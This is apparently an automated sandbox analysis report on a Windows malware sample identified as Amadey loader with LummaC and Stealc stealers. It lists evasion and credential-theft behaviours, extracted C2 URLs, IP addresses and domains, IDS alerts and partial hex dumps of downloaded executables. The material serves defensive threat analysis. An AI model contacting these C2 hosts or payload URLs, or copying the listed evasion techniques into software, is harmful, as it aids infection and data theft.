Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1571971
MD5: f5db9dcea4098275cb46b5d6fe73cef8
SHA1: 9b623e4cfff93bffbaf7034ebbf893773700ba94
SHA256: 34959918550ef8a11fe8e0ef9dde5f85f0dac541e62a2cad53998d4a0eb07d9d
Tags: Amadeyexeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.16/off/random.exeb Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php95dA Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/a Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpa4 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe_ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: ae5cfd188c.exe.3512.10.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["dare-curbys.biz", "print-vexer.biz", "zinc-sneark.biz", "se-blurry.biz", "atten-supporse.biz", "impend-differ.biz", "covery-mover.biz", "dwell-exclaim.biz", "formy-spill.biz"], "Build id": "LOGS11--LiveTraffic"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 55%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.7% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49889 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49897 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49898 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 9c2827fca4.exe, 0000001C.00000003.2709881052.0000000004770000.00000004.00001000.00020000.00000000.sdmp, 9c2827fca4.exe, 0000001C.00000002.2843648513.0000000000672000.00000040.00000001.01000000.00000012.sdmp, 9c2827fca4.exe, 00000021.00000003.2837715853.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, 9c2827fca4.exe, 00000021.00000002.2878103010.0000000000672000.00000040.00000001.01000000.00000012.sdmp
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 11_2_006DDBBE
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E68EE FindFirstFileW,FindClose, 11_2_006E68EE
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 11_2_006E698F
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_006DD076
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_006DD3A9
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_006E9642
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_006E979D
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 11_2_006E9B2B
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E5C97 FindFirstFileW,FindNextFileW,FindClose, 11_2_006E5C97
Source: chrome.exe Memory has grown: Private usage: 1MB later: 29MB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 191MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49758 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49764
Source: Network traffic Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.4:57488 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49781 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49790 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49787 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49800 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49814 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49813 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49807 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49827 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49821 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49833 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49834 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49842 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49806 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49852 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49861 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49864 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49870 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49835 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49874 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49897 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49906 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49880 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49806 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49827 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49827 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49834 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49834 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49790 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49790 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49781 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49781 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49861 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49897 -> 104.21.48.1:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: dare-curbys.biz
Source: Malware configuration extractor URLs: print-vexer.biz
Source: Malware configuration extractor URLs: zinc-sneark.biz
Source: Malware configuration extractor URLs: se-blurry.biz
Source: Malware configuration extractor URLs: atten-supporse.biz
Source: Malware configuration extractor URLs: impend-differ.biz
Source: Malware configuration extractor URLs: covery-mover.biz
Source: Malware configuration extractor URLs: dwell-exclaim.biz
Source: Malware configuration extractor URLs: formy-spill.biz
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:09 GMTContent-Type: application/octet-streamContent-Length: 1895424Last-Modified: Mon, 09 Dec 2024 21:09:04 GMTConnection: keep-aliveETag: "67575c70-1cec00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 a6 e5 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 79 6a 61 70 71 73 68 00 70 1a 00 00 60 30 00 00 6c 1a 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 6a 6e 73 65 6e 6f 65 00 10 00 00 00 d0 4a 00 00 04 00 00 00 c6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 ca 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:18 GMTContent-Type: application/octet-streamContent-Length: 1799168Last-Modified: Mon, 09 Dec 2024 21:09:11 GMTConnection: keep-aliveETag: "67575c77-1b7400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 40 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 69 00 00 04 00 00 8b d7 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 70 6e 71 7a 67 6b 67 00 d0 19 00 00 60 4f 00 00 d0 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 71 75 71 6f 76 6c 68 00 10 00 00 00 30 69 00 00 04 00 00 00 4e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 69 00 00 22 00 00 00 52 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 